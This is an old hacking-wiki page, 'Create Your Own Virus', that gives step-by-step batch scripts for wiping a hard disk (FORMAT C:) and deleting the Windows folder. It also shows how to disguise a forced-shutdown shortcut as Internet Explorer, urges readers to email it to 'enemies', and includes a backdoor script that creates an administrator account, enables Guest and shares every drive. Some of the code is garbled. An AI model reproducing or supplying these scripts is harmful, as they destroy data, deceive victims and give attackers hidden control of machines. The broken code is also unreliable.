Create Your Own VirusThis is a featured page

I know this is going to be controversial. This is for informational purposes only. DO NOT spread or release the viruses created in this article. This will land you in jail. I am going to teach you how to create a virus. One very basic batch virus to code yourself and two virus construction kits.

DO NOT RELEASE THESE VIRUSES.

Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press... Right?

I do not believe this to be a violation of the Instructables TOS, as I discourage you from releasing the viruses and I do not give you the viruses, I simply tell you how to create them.
Create Your Own Virus - Hackgyan >> Hacker's Heaven
step 1DIY (very) Basic Batch Script That Does Essentially Nothing
Please note new title. You may wish to skip to the next step.

What you should do here is to open a window of notepad. Enter
FORMAT C:

and save the file as disk_destroyer_basic.bat.

This won't spread or do anything fancy. It will just wipe your hard disk. There are a few quirks to be worked out with this method, but like I said, informational purposes only.
Create Your Own Virus - Hackgyan >> Hacker's Heaven

Here Is The Shutdown Virus: Only Tested On XP

Right Click On Your Desktop, Click New Shortcut



Where It Says "Type In The Location Of The Item" Type In:
shutdown -s -t 300 -c "your text here including the quotation marks"
You Can Easily Change The Time Of Your Shutdown
You See Where It Shows The "-t 300" The "t" Stands for Time
And The 300 Stands For Seconds The Shutdown Will Continue

Create Your Own Virus - Hackgyan >> Hacker's Heaven

Click Next And Type In "Internet Explorer" And Click Finish
It Should Look Like This:


Right Click Your Icon And Click Properties, then Click "Change Icon"
Scroll To The End And You Would Find A Icon The "E" Icon For Internet Explorer
Click It Then Click "Ok" Then Click "Apply" Then Click "Ok" again
Open It And You Will Get Your Virus wanting To Shut Down The Computer,
As You Can See You Can't Close It, Or Close It From The Task Manager.
The Only Way To Close It Is By Clicking Your Start Menu, Then Click
"Run" In The Path Type In "shutdown -a" Without Quotation Marks
The "a" Means Abort, So It Closes The Shutdown Process!
Create Your Own Virus - Hackgyan >> Hacker's Heaven

You Should Send This To Your Enemies,
Type In The Subject "Hey I Sent You The Latest IE Explorer"
And Make Up Your Own Message And Attach That File.

Happy Virus Making Create Your Own Virus - Hackgyan >> Hacker's Heaven

If You Have Any Problems Please Contact Me At jschafli@gmail.com

*PS* Please Don't Spam

WARNING MAKE VIRUS WITH CAUTION

Dos virus making
Here you will find out how easy it is to make virus in Ms dos.
Create Your Own Virus - Hackgyan >> Hacker's Heaven
Create Your Own Virus - Hackgyan >> Hacker's Heaven
Ok to start off making a dos virus you must have notepad all computers have it so just open it up then type in this code and save the file as a .BAT it must be .bat to work.
******************************start of code*****
@echo off
cd
cd c:\window
@deltree/y c:\windows
exit
**************end of code********
This will delete the file windows. ONLY USE THIS CODE TO DELETE WINDOWS ON YOUR OWN COMPUTER!
This one is going to be a bit more eviler then the last so do not go sending it out ok.
**********************code*******************************
@echo off
cd
cd c:/WINDOWS/system32
: copy
xcopy/c C:/windows
goto copy
cd
cd c:/WINDOWS/system32
: copy
xcopy/c %0
goto cop
******************end of code********************
This will delete system 32 and amke a backup copy of the file in windows and it will open up when the computer runs so if then get a backup of windows then it will get delete.
Now for a trojan in dos well maybe not a real trojan but it is a good virus and will give you admin power in a computer
you can use this if you have two pc in your house but if you use it on someone adn they dunno about it then the cops maybe coming to your door lol.
********************************************************
@ECHO OFF
start http: -anypage-
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net share a=a:\
net share b=b:\
net share c=c:\
net share d=d:\
net share e=e:\
net share f=f:\
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

you can write net share a$=a:\ if you want the shared files to be hidden and add del %0 at the end so the trojan will self distruct
*******************************************************
This trojan was not made by me.
I hope you like the dos virus and trojans come back soon for more updates.



Hackgyan
Hackgyan
Latest page update: made by Hackgyan , Aug 23 2008, 4:38 AM EDT (about this update About This Update Hackgyan Edited by Hackgyan

103 words deleted
7 images added
9 images deleted

view changes

- complete history)
Keyword tags: None
More Info: links to this page
Started By Thread Subject Replies Last Post
hazard74 Have a best virus tools?? 0 Jul 19 2009, 1:12 AM EDT by hazard74
Thread started: Jul 19 2009, 1:12 AM EDT  Watch
I want make a virus that have many funtion..
like spy, spam, trojen, and fake virus...

can u give me n i like u use Mediafire to download file.
17  out of 20 found this valuable. Do you?    
Keyword tags: None
Hackgyan Hungry Hackers 2 Aug 26 2008, 12:42 PM EDT by DownloadAnupload
Thread started: Feb 21 2008, 1:24 AM EST  Watch
Go to our official partner www.hungryhackers.blogspot.com for more topics related to hacking.
4  out of 6 found this valuable. Do you?    
Keyword tags: None
Show Last Reply
Showing 2 of 2 threads for this page